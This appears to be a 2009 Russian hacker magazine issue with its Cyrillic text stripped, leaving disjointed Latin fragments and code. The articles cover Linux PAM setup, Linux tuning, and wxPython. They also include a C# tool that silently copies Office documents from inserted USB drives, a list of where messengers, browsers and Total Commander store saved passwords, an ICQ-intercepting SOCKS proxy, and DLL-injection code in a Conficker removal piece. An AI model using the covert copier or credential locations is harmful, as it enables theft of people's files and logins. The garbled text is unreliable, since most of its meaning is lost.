Mint Gufw,
( ), Advanced. , mintNanny.
, /etc/hosts
0.0.0.0.
;
.
, Synaptic, russian
. GNOME
language-pack-gnome-ru.
calculate-linux.ru, -).
HDD USB-HDD ext4, ext3, ext2, ReiserFS, JFS XFS. FTP/
HTTP LiveCD. Torrent LiveDVD.
FTP
, . KDE
CLD, XFCE CLD. .
:
( - );
( 2
);
Memtest.
( ), , .
( XFCE-);
. DHCP- ,
Wicd.
Live- guest/guest.
root su.
LZMA-
, . OpenOffice.org 3.0.1, StarDict, Firefox 3.0.10
( Flash-), ClawsMail, Pidgin, XChat, GIMP 2.6.6, Audacious,
Mplayer gnome-mplayer. , .
, <Caps Lock>.
calculate. ,
, :
# calculate --update
(www.calculate-linux.ru/_) , ,
:
# calculate --disk=/dev/sda2
root.
ReiserFS,
GRUB MBR. . Calculate
, > 45 ( ), : calculate --disk=/dev/sda.
.
Gentoo emerge.
:
ISO - /usr/calculate/share/linux
calculate. ,
.
LINUX MINT
, , , Moblin
x86- AMD Geode VIA Nano/C7.
: Acer Aspire One, Asus eeePC 901, 1000H, Dell Mini
9, MSI Wind, Lenovo S10, Samsung NC10, HP Mini 1010 1120NR.
.
, ,
,
.
Moblin Fedora (
, 9). - ,
Clutter (clutter-project.org), OpenGL OpenGL ES
( , www.khronos.org/opengles).
Clutter OpenedHand,
Intel. , Clutter
GLX- X.org,
Android, Moblin Linux. , .
img- 700 ,
USB- CD.
dd.
image-writer (git.moblin.org/cgit.cgi/
moblin-image-creator/plain/image-writer).
Live- (netboot).
XFCE, . , X 08 /128/ 09
.
, - .
, .
.
. (
) Favourite Applications.
m_zone ,
Twitter Last.fm.
, .
(, ). ,
, .
Bickley (moblin.org/projects/bickley)
.
Moblin -,
Mozilla Gecko, , IM- Empathy (
Jabber, Gtalk, ICQ, MSN, IRC, Salut)
. Moblin Image Creator 2
(MIC2), Moblin.
,
. , , . ,
, , . z
/ ZOBNIN@GMAIL.COM /
PAM
>> unixoid
PAM
UNIX. , .
,
USB-, chroot-
-.
FEDORA 11 LEONIDAS
PAM
PAM (Pluggable
Authentication Modules)
( PAM , z
2006 , ..) , ,
.
, ,
/ .
/bin/login, .
PAM /etc/passwd .
PAM,
/bin/login
. ,
PAM
,
(
!)
( chroot -
!)
.
PAM ,
/ .
/etc/pam.d. /etc/pam.d/
login, /bin/login:
# vi /etc/pam.d/login
auth      sufficient  pam_self.so       no_warn
auth      include     system
account   requisite   pam_securetty.so
account   required    pam_nologin.so
account   include     system
session   include     system
password  include     system
PAM_ABL
PAM
,
, PAM-,
.
:
auth , ;
account , ,
;
session (,
);
password ,
( /usr/
bin/passwd).
, ,
()
. , (
,
/etc/security).
include,
( ).
system ( /etc/pam).
FreeBSD; Linux- Debian Ubuntu
common-*
(common-auth, common-session ..), Gentoo
Mandriva system-*.
PAM,
/etc/passwd :
auth required pam_unix.so no_warn try_first_pass nullok
, ,
.
. ,
, , (
, ). , , /etc/pam.d/
su, auth :
# vi /etc/pam.d/su
auth      sufficient  pam_rootok.so  no_warn
auth      sufficient  pam_self.so    no_warn
auth      requisite   pam_group.so   no_warn group=wheel root_only fail_safe
auth      include     system
pam_rootok, UID , , ,
.
( sufficient).
( root), pam_self,
, UID UID ,
.
,
( : vasya
su vasya, ,
su , ). pam_group
wheel, , ,
( requisite).
,
auth /etc/pam.d/system (
pam_unix, ).
.
, su ?
auth sufficient pam_deny.so.
pam_deny false.
, su
, root.
pam_permit, .
/etc/pam.d/su auth sufficient
pam_permit.so, su ,
, .
,
.
USB-
Linux-PAM
OpenPAM
,
auth. , ,
pam_guest,
, pam_ftpusers,
/etc/ftpusers, pam_securetty,
,
secure /etc/ttys ( /etc/securetty Linux).
,
.
,
USB-,
- . , , pam_usb.
USB-
. ,
. ?
.
FreeBSD pam_usb ,
Linux ( Debian/
Ubuntu). pam_usb
:
# apt-get install libpam-usb pamusb-tools
USB- pamusbconf, :
# pamusb-conf --add-device _
,
, ,
PAM
PAM Sun Microsystems, 1995 . PAM Solaris 2.3,
UNIX- , Linux,
FreeBSD, NetBSD Mac OS X. API PAM
XSSO. PAM :
, Solaris;
Linux-PAM, Linux;
OpenPAM, BSD-.
INFO
, . , y.
,
USB-:
# pamusb-conf --add-user root
info
Linux-PAM
Red Hat,
RedHat
3.0.4 (1996 ).
FreeBSD
OpenPAM
.
LinuxPAM.
, y
:
# pamusb-check root
pam_usb .
pam_usb auth .
PAM, , /etc/pam.d/
PAM
SSHD
common-auth.
, pam_unix.so,
auth sufficient pam_usb.so. ,
PAM
common-auth, , USB-,
.
.
fprint (www.reactivated.net/fprint/wiki/Main_Page),
( USB-)
. ,
pam_fprint.
libfprint pam_fprint
Ubuntu Fedora
FreeBSD (/usr/ports/security/pam_fprint). ,
OPENPAM
PAM /etc/
pam.d
/etc/
pam.conf.
HTTP://WWW
links
PAM
: www.
xakep.ru/magazine/
xa/086/112/1.asp.
PAM
.
:
$ pam_fprint_enroll --enroll-finger 6
6 .
fprint ,
, 1 , 8
.
. pam_fprint auth
. /etc/
pam.d/common-auth ( /etc/pam.d/system FreeBSD)
auth sufficient pam_fprint.
so. required
sufficient,
( ;
).
,
PAM -
, , . X 08 /128/ 09
:
PAM-,
.
, , pam_listfile (
Linux-PAM). .
PAM-
/etc/users.allow:
auth sufficient pam_listfile.so item=user sense=allow file=/etc/users.allow onerr=fail
,
:
WARNING
info
OpenBSD PAM .
PAM
Kerberos.
PAM FREEBSD
account (,
, ,
, ). ssh .
account: account required
pam_access.so /etc/security/access.conf
:
# vi /etc/security/access.conf
+ : ALL : 192.168.1
+ : good_guy : ALL
- : ALL : ALL
, ssh
192.168.1.0 good_guy. .
pam_lockout (ostatic.com/pam-lockout).
PAM: auth requisite pam_lockout.so user=bad_guy.
pam_alreadyloggedin (ilya-evseev.narod.ru/posix/pam_alreadyloggedin).
,
( , ,
<Alt+Fx>).
auth (
):
auth required /lib/security/pam_securetty.so
auth sufficient /lib/security/pam_alreadyloggedin.so no_root
,
pam_pwdfile (cpbotha.net/software/pam_pwdfile).
,
/etc/passwd. , .
: FTP- vsftpd. , . : pam_pwdfile,
vsftpd.
/etc/pam.d/vsftpd:
auth required pam_pwdfile.so pwdfile /usr/local/etc/vsftpd/vsftpd.users
account required pam_pwdfile.so pwdfile /usr/local/etc/vsftpd/vsftpd.users
chpwdfile
(eclipse.che.uct.ac.za/chpwdfile) : :MD5--.
pam_abl (hexten.net/
pam_abl),
-.
UNIX . ,
,
. /etc/pam.d/sshd
auth required pam_abl.so config=/etc/
security/pam_abl.conf. . , , X 08 /128/ 09
,
.
- . /etc/security/pam_abl.conf
:
# vi /etc/security/pam_abl.conf
//
host_db=/var/lib/abl/hosts.db
//
host_purge=2d
// 10
1
host_rule=*:10/1h
,
, CHROOT
, PAM- session
, . ,
.
pam_limits
Linux-PAM ( OpenPAM).
/etc/
security/limits.conf.
, pam_chroot (sourceforge.net/
projects/pam-chroot),
. ,
shell-, ftp- -
, . .
:
# echo 'session required pam_chroot.so' >> /etc/pam.d/ssh
# echo 'vasya /usr/chroot' >> /etc/security/chroot.conf
pam_winbind,
AD, pam_ldap, , LDAP.
Linux pam_namespace.
(/tmp, )
. , /tmp
.
, (race
condition), .
/etc/security/
namespace.conf ,
. /tmp:
# mkdir /tmp-inst
# chmod 0 /tmp-inst
# echo "/tmp /tmp-inst/ user root" >> /etc/security/namespace.conf
# echo "session required pam_namespace.so" >> /etc/pam.d/common-session
: /tmp ,
root ( /tmp-inst/).
/home (
) :
$HOME $HOME/$USER.inst/ user root
PAM- password ,
. ,
.
pam_cracklib
:
;
, ;
, (UnixOid, UnIxOiD);
- ( : unixoid,
: dioxinu);
, .
, pam_
cracklib /etc/pam.d/passwd, passwd.
:
password required pam_cracklib.so retry=3 minlen=8 dcredit=-2 ucredit=-1 ocredit=-1 lcredit=0
password required pam_unix.so use_authtok
: 6 , ,
(, ).
PAM ,
,
.
,
,
PAM, ( ).
www.kernel.org/pub/linux/libs/pam/modules.html.
PAM,
Linux-PAM. z
-
MegaFAQ Linux
>> unixoid
Linux- ,
512 ASUS EeePC.
, ,
Firefox
.
Linux, 16 i486? , ,
,
, .
Q.
Linux . .
- ?
A. , , .
, /etc/init.d/rc
:
for i in /etc/rc$runlevel.d/S*
do
case "$runlevel" in
*) startup $i start ;;
esac
done
*) startup $i start ;;
*) startup $i start & ;;.
:
,
.
. , Linux , X 08 /128/ 09
,
.
:
# echo "20" > /proc/sys/vm/swappiness
/etc/sysctl.conf:
vm.swappiness = 20
.
,
, ( ),
,
:
INIT-NG
.
.
. ,
4 : A, B, C D, C ,
, , 15-20, D
, C. , C , D ,
C. , D .
. ? : cinit,
, . , cinit
D, C, D, .
cinit
: nico.schottelius.org/documentations/
speeches/metarheinmain-chaosdays-110b/
cinit/view.
InitNG (Init Next Generation).
z _03_2006).
, upstart,
, ~10 .
Q. ?
A.
(drakxservices Mandriva, systemconfig-services Fedora, services-admin
Ubuntu),
rcN.d-
(
, -
).
Q. ?
A. free .
(
) ?
, ,
-, , .
.
( 512 ):
# dd if=/dev/zero of=/swap/sw-file bs=1k count=524288
# mkswap /swap/sw-file 524288
# swapon /swap/sw-file
, (
swapon -a).
Q. ?
A. ,
20 30. ,
. ,
.
,
, OpenOffice,
GIMP,
, 70, , 80 85.
vm.pagecache = 90
vm.dirty_ratio = 50
Q.
?
A.
. hdparm,
. ,
:
$ hdparm /dev/sda
$ hdparm -i /dev/sda
,
:
MaxMultSect/MultSect /
,
(
);
PIO modes/DMA modes ,
(, , );
multcount ;
I/O support
(16- , 32- 32 );
using_dma DMA ;
readahead .
(
) /etc/hdparm.conf /etc/
default/hdparm ( ).
hdparm -tT /dev/sda.
DMA (-d1), 32-
/
,
Linux /
(I/O scheduler) . I/O scheduler , /sys/
block/sda/queue/scheduler:
# cat /sys/block/sda/queue/scheduler
noop anticipatory deadline [cfq]
SYSTEM-CONFIG-SERVICES
-W (0/1), /
. -
FREE
.
Q. ?
A. nice,
, ionice
. Ubuntu ionice
schedutils.
:
ionice -c -n -p PID
0 7 ( ,
). :
1. Real time ,
(8
[0-7]);
2. Best Effort ,
(8
);
3. Idle ,
; .
PID :
$ sudo ionice -c2 -n0 mplayer
Q. ?
A. .
,
, . , , ext3,
Linux-.
, :
.
, ,
.
,
,
. :
#1. ,
/.
#2. /usr, .
#3. /home,
.
#4. /tmp, .
#5. /var, .
,
(
)? : .
ext2 (
DRAKXSERVICES
) noatime ( ).
/tmp,
, atime .
/var ,
ReiserFS, /home ,
.
, /tmp
tmpfs,
. ,
, .
/etc/fstab:
tmpfs /tmp tmpfs size=512m,mode=1777 0 0
: ,
ext4.
, ,
, , ext4
,
.
Q. ?
A.
,
X.org. ATI nVidia,
- 2D- (
), .
nv,
KDE 4.1.1.
UT, 166
( ),
1 , 2.6-
.
XFCE. ?
, nv,
2D- ( 2D) .
, nvclock (www.linuxhardware.org/
nvclock), , .
nVidia 5900FX. -
Far Cry ( wine).
,
nvclock -f -n 540, 400 540,
.
3D-
. , (
, 3D- ),
.
Q. Compiz?
A. . , Ubuntu
.
:
# gtk-window-decorator --replace
( GNOME)
# kde-window-decorator --replace
UBUNTU
( KDE)
Q. -
?
A. , . ATI nVidia,
, ,
GPU. Khronos Group,
OpenCL (www.khronos.
org/opencl), GPU . ,
,
.
. Linux
Memory Technology
Device (MTD),
,
, PCI. , en.gentoo-wiki.com/
wiki/TIP_Use_memory_on_video_card_as_swap,
()
,
.
,
, /tmp. :
,
VGA-.
Q. - , .
?
A. Linux
IPv6.
IP , . , ipv6,
/etc/modprobe.conf,
, /etc/modprobe.d/
blacklist.local blacklist ipv6.
, / TCP window
scaling,
TCP-,
,
.
:
# sysctl -w net.ipv4.tcp_window_scaling=0
,
/etc/sysctl.conf:
net.ipv4.tcp_window_scaling=0
TCP window
scaling,
TCP- :
net.ipv4.tcp_rmem = 4096 87380 174760
net.ipv4.tcp_wmem = 4096 87380 174760
UDP:
net.ipv4.udp_rmem_min = 16384
net.ipv4.udp_wmem_min = 16384
net.ipv4.udp_mem = 8388608 12582912 16777216
Linux 2.6
,
:
net.ipv4.tcp_no_metrics_save = 1
net.ipv4.tcp_moderate_rcvbuf = 1
net.core.netdev_max_backlog = 2500
,
: sysctl -a | grep tcp.
.
txqueuelen
ifconfig:
# ifconfig eth0 txqueuelen 1000
2.6.7, reno
( ).
, :
# sysctl net.ipv4.tcp_available_congestion_control
,
.
6 : reno, cubic, bic, htcp, vegas westwood.
,
cubic htcp,
. ,
,
westwood.
:
sysctl -w net.ipv4.tcp_congestion_control=htcp
Q.
?
A.
cron,
,
/etc/cron.hourly
(), /etc/cron.daily (), /etc/
cron.weekly () /etc/cron.monthly
().
,
,
.
/etc/cron.hourly (
).
Q.
?
A. , !
mcompress, :
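#!/bin/sh
# Compress the modules of the running kernel with gzip
VER=`uname -r`
MAJ=`echo $VER | awk -F. '{print $1}'`
MIN=`echo $VER | awk -F. '{print $2}'`
# Modules are named *.ko since kernel 2.5 and *.o before that
if [ "$MAJ" -gt 2 ] || [ "$MAJ" -eq 2 -a "$MIN" -ge 5 ]; then
OBJ=ko
else
OBJ=o
fi
find /lib/modules/$VER/ -name "*.$OBJ" -exec gzip -9 '{}' ';'
depmod -a; depmod -A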
Q.
?
A. . :
xsane, sane-utils, libsane, foomatic-db-hpijs,
hpijs, hplip
HP ( HP, ,
,
);
w3m ( , ?
);
bogofilter, bogofilter-{bdb,common} ;
splix Samsung
SPL2 ( Lexmark, SPL2
);
gucharmap ;
onboard ;
rss-glx .
. .
,
. , ttf-arabeyes,
ttf-lao, ttf-arphic-uming, ttf-sazamani*, ttf-indic*,
ttf-unfonts-core, ttf-thai* .
80 .
.
.
. OpenOffice GIMP?
, ,
.
, , .
,
README, CHANGES, GPL, LICENSE, AUTHORS,
ChangeLog .. , !
.
/usr/share/doc , .
,
- ,
,
.
250 .
Q.
?
A. ,
.
.
.
,
3-5%,
Gentoo Stage1
:
-O2
.
-fomit-frame-pointer
.
-funroll-loops .
-mcpu=_ .
-march=_ +
.
-pipe
( ).
-mcpu -march
: gcc.gnu.org/onlinedocs/gcc/i386-and-x86_002d64-Options.html.
.
, totem,
amarok, k3b, firefox, thunderbird
. wmii, ion3 awesome,
mc , links2, dillo
elinks web, mutt
, snownews RSS, sonata
+ mpd , mplayer .
,
.
.
.
,
screen/tmux. z
>> coding
GUI PYTHON!
/SHPAK.VADIM@GMAIL.COM/
, .
. GUI
Python.
GUI PYTHONE
GUI. Python . GUI
. -, ,
Python. -, GUI-.
GUI-: Tkinter Tcl/Tk, wxPython
wxWidgets, PyQt Qt ( , ). Tkinter
Python, GUI .
wxPython. GUI-
wxWindows.
IDE
IDE, GUI. , , ,
. , wxPython BoaConstructor. GUI:
, ,
( ). IDE ,
.
.
wxPython .
HELLO, WORLD!
:
GUI GUI! ,
Hello, world! wxPythone.
import wx

class HelloFrame(wx.Frame):
    def __init__(self):
        wx.Frame.__init__(self, id=-1, parent=None,
                          pos=wx.Point(422, 270), size=wx.Size(300, 200),
                          title="Hello Frame")
        self.panel = wx.Panel(self)
        self.helloButton = wx.Button(id=-1, label="Push me.", parent=self.panel,
, Hello, world!.
?
. wxPython-
: .
,
, . :
1) app = wx.PySimpleApp() ,
wx.App . ,
wxPython.
2) OnInit() .
. False, .
3) frame = HelloFrame() (
wx.Frame ). , , OnInit()
,
! ( ), .
( SetTopWindow()) ( , ).
():
wx.Frame(parent, id=-1, title="",
         pos=wx.DefaultPosition, size=wx.DefaultSize,
         style=wx.DEFAULT_FRAME_STYLE, name="frame")
,
. .
id, .
id.
:
1)
.
2) wx.NewId().
3) wx.ID_ANY -1 (
).
-
, .
: self.panel.Bind(wx.EVT_BUTTON, self.OnButtonClick, self.helloButton).
panel , , helloButton, OnButtonClick(self,
event).
, , ,
, ( ).
helloButton,
OnButtonClick() Frame, .
:
Skip(),
(
, ).
.
. , , ,
.
wx.Panel , , ,
, .
,
.
. .
, . ,
( pos size).
Get/Set (
, C++,
wxPython wxWindows,
C++).
,
, .
(events) wxPythone , .
MainLoop(), .
, ,
. .
- , ,
, . wx.Event
. , wx.MouseEvent 14 ,
wx.EVT_RIGHT_DOWN, wx.EVT_LEFT_UP ..
wxPython,
. ,
wx.Button wx.CommandEvent
EVT_BUTTON. ,
, ,
.
, , ,
,
wx.PyEventBinder. .
,
.
wx.EvtHandler, ,
Bind. - ,
. : Bind(event, handler,
source=None, id=wx.ID_ANY, id2=wx.ID_ANY).
. Event wx.PyEventBinder, ; handler , ,
.
source , (
, , ).
, , , Hello,
world!, . .
GUI .
GUI:
1. .
2. .
3. GUI .
( Windows).
270 . ,
.
, .
,
/ , ,
. GUI,
.
, GUI.
.
, .
1. ,
,
(, buttonMul
button_12).
2. .
On. ,
, , (,
OnButtonEraseClick , ,
buttonErase). ,
, ,
.
3.
.
,
(
), .
, , , ,
labele . :
children = self.panel.GetChildren()
for child in children:
    if child.GetId() == event.GetId():
        self.textCtrlInfo.AppendText(child.GetLabel())
HTTP://WWW
links
http://www.python.org/doc/faq/gui
Pythons GUI FAQ.
http://www.wxpython.org
wxPython.
wiki.python.org/moin/GuiProgramming
IDE
.
. Pythona,
. ,
(=)
(
OnOperationClick). ,
,
Pythone. -
, (, 2+3,
2+3=5 ).
, ,
GUI.
, .
1. ,
(,
).
,
.
. , style
wx.DEFAULT_FRAME_STYLE & ~(wx.MAXIMIZE_BOX | wx.RESIZE_BORDER).
2.
, , .
.
:
try:
    number = float(self.textCtrlInfo.GetValue())
except (TypeError, ValueError):
    self.errorStatusBar.SetStatusText(
        '! .')
    return
http://boaconstructor.
sourceforge.net
IDE
GUI.
http://www.pdfsearch-engine.com/
wxpython-in-actionpdf.html
WxPython in action.
float; , , ,
errorStatusBar .
, (TypeError,
ValueError). errorStatusBar.
, .
3. ,
. ,
: textCtrlInfo.SetMaxLength(30).
, wxPython .
wxPython. ,
. wxPython
wxPython
Demo, .
.
. WxPython in
action Noel Rappin Robin Dunn.
.
, ,
( 1,2,3,11,14). wxPython .
GUI
Pythone, . ! z
DVD
dvd
.
wxPython.
/ ANTONOV.IGOR.KHV@GMAIL.COM /
-
// ( ) . ,
.
,
.
.
,
- , .
,
.
, :
.
, .
C#.
.NET
.
. , ,
.
. , ,
.
ProgressBar. .
- .
,
,
. ,
.
,
.
,
.
.
, . ,
MSDN. ,
. !
WINAPI ...
(
)
WM_DEVICECHANGE. ,
?
. $10 $100.
, . ,
, . ,
;).
.
WindowProc. :
,
LRESULT CALLBACK WindowProc (
    HWND hwnd,
    UINT uMsg,
    WPARAM wParam,
    LPARAM lParam
)
XDIRECTORY
SOURCE
DESTINATION
.
.
OVERWRITE
. TRUE,
FOLDERFILTER
FILEFILTERS
LAUNCH-
WParam ,
WM_DEVICECHANGE. :
- DBT_DEVICEARRIVAL
- DBT_DEVICEREMOVECOMPLETE
, ,
, , ?
( usb)
(, , ..). ,
. LParam
_DEV_BROADCAST_HDR,
dbch_devicetype. , ,
. DBT_DEVTYP_VOLUME,
!
typedef struct _DEV_BROADCAST_HDR {
    DWORD dbch_size;        // size of the structure
    DWORD dbch_devicetype;  // device type
    DWORD dbch_reserved;    // reserved
} DEV_BROADCAST_HDR, *PDEV_BROADCAST_HDR;
flashcopier.ItemCopied +=
new ItemCopiedEventHandler(ItemCopied);
++++
++++
flashcopier.CopyComplete +=
new CopyCompleteEventHandler(CopyComplete);
flashcopier.Source =
new DirectoryInfo(e.Drive.ToString());
flashcopier.Destination =
new DirectoryInfo(dirName);
flashcopier.Overwrite = true;
flashcopier.FolderFilter = "*";
flashcopier.FileFilters.Add("*.doc");
flashcopier.FileFilters.Add("*.xls");
//
//....
flashcopier.StartCopy();
STARTCOPY
CANCELCOPY
XDIRECTORY
API, . . ;
. , .NET C#
.
.NET
C#.
? . WinAPI,
? ?.
- . WinAPI- ( ),
.
. C#,
.
( ) .
. ,
,
Windows API.
, , , Jan Dolinay.
DriveDetector, :
-;
;
;
;
;
,
.
, .
. :
flashDriveDetector = new DriveDetector();
, , . , ,
DEV_BROADCAST_VOLUME.
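typedef struct _DEV_BROADCAST_VOLUME {
    DWORD dbcv_size;       // size of the structure, in bytes
    DWORD dbcv_devicetype; // device type (DBT_DEVTYP_VOLUME)
    DWORD dbcv_reserved;   // reserved, do not use
    DWORD dbcv_unitmask;   // bit mask of the logical drives affected
    WORD  dbcv_flags;      // DBTF_MEDIA or DBTF_NET
} DEV_BROADCAST_VOLUME, *PDEV_BROADCAST_VOLUME;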
dbcv_unitmask. ,
,
. , 0, A;
1, B ..
.
flashDriveDetector.DeviceArrived +=
new DriveDetectorEventHandler(OnDriveArrived);
flashDriveDetector.DeviceRemoved +=
new DriveDetectorEventHandler(OnDriveRemoved);
DriveDetector
DeviceArrived() DeviceRemoved().
, .
Form1().
DeviceArrived. .
,
.
flash_ ,
, .
,
CreateDirectory().
.
DirectoryInfo, ,
Create(),
.
.
xDirectory.
, ,
: .
, xDirectory . -
.
, . ,
.
. , . ,
. XXI ,
xDirectory
.
, // ,
.
. ( ) usb-
, .
USB-
. . -. .
,
.
/ ,
.
, . , launch-.
, , , portable- ,
, .
.
XDIRECTORY
ITEMINDEXEDEVENTHANDLER
INDEXCOMPLEATEEVENT
HANDLER
ITEMCOPIEDEVENTHANDLER
COPYCOMPLETEEVENTHANDLER
, .
.
?
, - .
Documents and Settings\\
Application Data\%ProgramName% .
ProgramName .
,
xDirectory (
) .
. ( ),
.NET (
TC):
RegistryKey readKey = Registry.CurrentUser.OpenSubKey("software\\Ghisler\\Total Commander");
string key = (string) readKey.GetValue("InstallDir");
. .
, .
,
,
.
WARNING
warning
.
?
!
DVD
dvd
.
MAIL.AGENT
Mail.ru
( ). , ,
:
, . ,
, . ( )
-. ,
.
1. . MA
Documents and Settings\%%\Application Data\Mra\base.
base mra.dbs. , ,
.
2. -.
MRA\% %\clist5.txt. ,
mail.agent (
). , @.
3. . (, )
HKCU\Software\Mail.RU\Agent\
magent_logins2\%Account% ####password.
GTALK
Google ,
gabber- gTalk. gTalk
. ,
, ,
.
gTalk HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts.
, -
gTalk.
pw.
TOTAL COMMANDER
Total Commander ,
.
(
). FTP-. , , ,
.
TC ,
ini-. ,
(ip, ,
..) Total Commander wcx_ftp.ini,
. ,
Total Commander, .
HKEY_CURRENT_USER\Software\Ghisler\Total Commander.
FIREFOX
WEB, ,
. web-. 99% .
/ ,
.
-
MSDN
. , ,
.
, . , , .
1. sessionstore.js .
2. signons3.txt ( FF).
3. signons.sqlite SQLite-,
.
4. key3.db , .
Document
and Settings\%UserName%\Application Data\Mozilla\FireFox\
Profiles\% %.
OPERA
Opera , . , .
, Opera , FireFox.
Document and
Settings\%UserName%\Application Data\Opera\profile wand.
dat. , Opera
, FireFox.
SKYPE
.
,
. , ,
( , FF).
Document and Settings\%userName%\Application Data\Skype\
HKEY_CURRENT_USER\Software\
Skype\ProtectedStorage.
QIP
, QIP Application Data\qip.
COPYING COMPLETED
.NET ,
. , ,
, WinAPI ASMe. - ,
, WinAPI , ,
. ,
. ,
, , .z
PREDIDENTUA
/ HTTP://TUTAMC.COM /
-
socks- Pythone
socks- ,
IP.
: , ,
.
1.
Google Chrome
. ,
. , .
! socks-,
Chromea. . ,
http- ( , user-agent) ,
. ,
, , . ,
.
2.
FOA Group.
socks-, POST- ,
, AES
BASE64. , , . : [FOA]secure text[/FOA], socks- -
[FOA]BASE64==[/FOA]. html-
. -
base64-, ,
- .
3.
, - . ( ,
). ,
.
,
. -, Simp,
socks-,
RSA-. -, :).
. , Python.
SOCKS-
Socks .
, , -.
SOCKS
IP- , socks-.
PySocks.py . ,
,
Windows7? , PySocks py pyw.
. ,
recv. PySocks.
py ,
( ):
data = readable_sock.recv(self.server)
if data:
    if readable_sock == client_sock:
        my_type = 1
    else:
        my_type = 2
    data = my_hack.my_hack(my_type, data)
    writeableslist[0].send(data)
    if readable_sock == client_sock:
        octets_out += len(data)
    else:
        octets_in += len(data)
else:
    raise Connection_Closed
OSCAR. !
.
( ). client_sock , ,
my_hack. .
, my_hack,
, , .
my_hack.py,
socks-, :
def my_hack(type, data):
    return data
, (my_hack) , ,
socks-.
OSCAR
HTTP://WWW
links
: dev.aol.com/
aim/oscar.
OSCAR , ,
. AOL ( Time Warner): ICQ AIM. AOL 5 2008
. , .
DES:
sourceforge.net/
projects/pydes.
Pythone socks,
:
sourceforge.net/
projects/pysocks.
DVD
dvd
socks
.
!
INFO
info
SOCKS
,
(). SOCKS
SOCKetS (,
).
NETBEANS
pyDes.py, Todd
Whiteman.
padmode=pyDes.PAD_PKCS5.
encrypt decrypt .
, -.
:
.
, , .
.
my_hack:
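import pyDes

# Encrypt data with DES; the password is the key (pyDes requires 8 bytes)
def encode(password, data):
    k = pyDes.des(password, padmode=pyDes.PAD_PKCS5)
    return k.encrypt(data)

# Decrypt data with DES using the same 8-byte password
def decode(password, data):
    k = pyDes.des(password, padmode=pyDes.PAD_PKCS5)
    return k.decrypt(data)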
DES-,
3DES. AES, Python
Cryptography Toolkit.
# write the data received from the client to a file
if type == 1:
    file = open('q.txt.', 'w+')
    file.write(data)
    file.close()
,
0x2a02, 2 (,
). 2 ,
, 6 .
;
0x00040006.
26.
. ,
. 39 + 4 .
45 + _ .
NETBEANS
,
:
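if type == 1:
    # packet starts with 0x2a 0x02 and carries 0x00040006 at offset 6
    if (data[0:2] == '\x2a\x02'
            and data[6:10] == '\x00\x04\x00\x06'):
        # length of the number field (byte 26)
        len_num = ord(data[26])
        # length of the message text
        len_msg = (ord(data[39+len_num])*256
                   + ord(data[40+len_num]) - 4)
        # the message text itself
        msg = data[45+len_num:45+len_num+len_msg]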
, ? ,
, .
,
base64 base64,
, DES
:
enc_msg = encode(password, msg)
enc_msg = base64.encodestring(enc_msg)
!
. , ,
, .
# new length of the message block
len_enc_msg = len(enc_msg) + 4
len_num_1 = chr(len_enc_msg // 256)
len_num_2 = chr(len_enc_msg % 256)
# rebuild the packet around the encrypted message
data = (data[0:39+len_num] + len_num_1
        + len_num_2 + '\x00\x02\x00\x00'
        + enc_msg + data[45+len_num+len_msg:])
5- 6- , :
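# new total length, stored in bytes 5 and 6 of the packet
len_all = len(data) - 6
len_all_1 = chr(len_all // 256)
len_all_2 = chr(len_all % 256)
# write the new length back into the header
data = data[0:4] + len_all_1 + len_all_2 + data[6:]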
(
), hex.
, , . . -,
, , , .
,
, -
. , , ,
, https.
, ,
, . sslstrip,
12- .
, ! ?
? , , :).
, , , . : spirt40@gmail.com! z
/ALEKSANDR-EHKKERT@RAMBLER.RU/
, , WinDDK ,
,
Windows .
CONFICKERA
-, , 10 . ,
.
,
.
, . ?
.
.
, ,
(, ?)
102
. . ,
, svchost.exe.
.
,
. ,
(
USB-, , , ).
. dll, . -,
system32 dll- .
, ,
svchost.exe.
Sysinternals, . , dll-
PEBe (
z, PETools . ListDlls Sysinternals,
. HandleViewer
lepujmlx.dll, svchost.exe. ,
, ,
.
, ntdll.dll, ,
, . , .
RKUnhooker .
, Confickera
( KidoKiller KAV EConfickerRemover ESET), ,
, lepujmlx.
dll , .
, svchost.exe lepujmlx.dll,
.
dll
svchost.exe .
Confickera,
, ; . -
- ,
.
, ,
LdrLoadDll . , NtOpenProcess, NtWriteVirtualMemory
NtReadVirtualMemory . ,
.
, .
, ,
FreeLibrary, ,
. , ,
.
. , dll
CreateRemoteThread.
:
DLL
: , , dll .
LoadLibrary ,
, LdrLoadDll. ,
LdrLoadDll, , ,
LdrLoadDll ntdll.dll.
usermode ntdll.
hProcess = OpenProcess(...);
LibFileRemote = (PWSTR) VirtualAllocEx(hProcess...);
WriteProcessMemory(hProcess, LibFileRemote, ...);
PTHREAD_START_ROUTINE fnThreadRtn =
(PTHREAD_START_ROUTINE) GetProcAddress(
GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hThread = CreateRemoteThread(hProcess, NULL, 0,
fnThreadRtn, LibFileRemote, 0, NULL);
LdrLoadDll
LdrpLoadModule LdrAttachProcess, .
,
.
RKUNHOOKER SSDT
HTTP://WWW
links
Windows
rsdn.ru wasm.ru.
Win
ntkernel.com.
INFO
info
Windows
,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDriveTypeAutoRun 0xff.
dll OpenFile/
CreateSection/MapViewOfSection. , ,
.
(, ntdll.dll
):
DWORD GetDllFunctionAddress(
    char* lpFunctionName,
    PUNICODE_STRING pDllName)
{
    ZwOpenFile(...);
    ZwCreateSection(...);
    ZwMapViewOfSection(...);
    ...
    dosheader = (IMAGE_DOS_HEADER *)hMod;
    // (PE header and export directory lookup elided)
    ...
    // walk the export table and compare each name with the one requested
    for (i = 0;
         i < pExportTable->NumberOfFunctions;
         i++)
    {
        functionName = (char*)((BYTE*)hMod +
            arrayOfFunctionNames[i]);
        functionOrdinal = arrayOfFunctionOrdinals[i]
            + Base - 1;
        functionAddress = (DWORD)((BYTE*)hMod +
            arrayOfFunctionAddresses
            [functionOrdinal]);
        if (RtlCompareString(&ntFunctionName,
            &ntFunctionNameSearch, TRUE) == 0)
            return functionAddress;
    }
    return 0;
}
, LdrLoadDll, .
,
. LdrLoadDll,
. ,
, . KeAttachProcess svchost.exe
PEB (Process Environment Block; ,
z).
LDR_DATA_TABLE_ENTRY,
, ModuleBaseAddress.
: ntdll.dll
svchoste. , ,
LdrLoadDll.
myLdrLoadDll, .
, .
, .
, :
ntdll.dll
ZwQueryInformationProcess(
    NtCurrentProcess(),
    ProcessBasicInformation, &ProcInfo,
    sizeof(PROCESS_BASIC_INFORMATION), &Size);
pPeb = ProcInfo.PebBaseAddress;
// : pPeb (PEB*)0x7FFDF000;
PPEB_LDR_DATA Ldr = pPeb->Ldr;
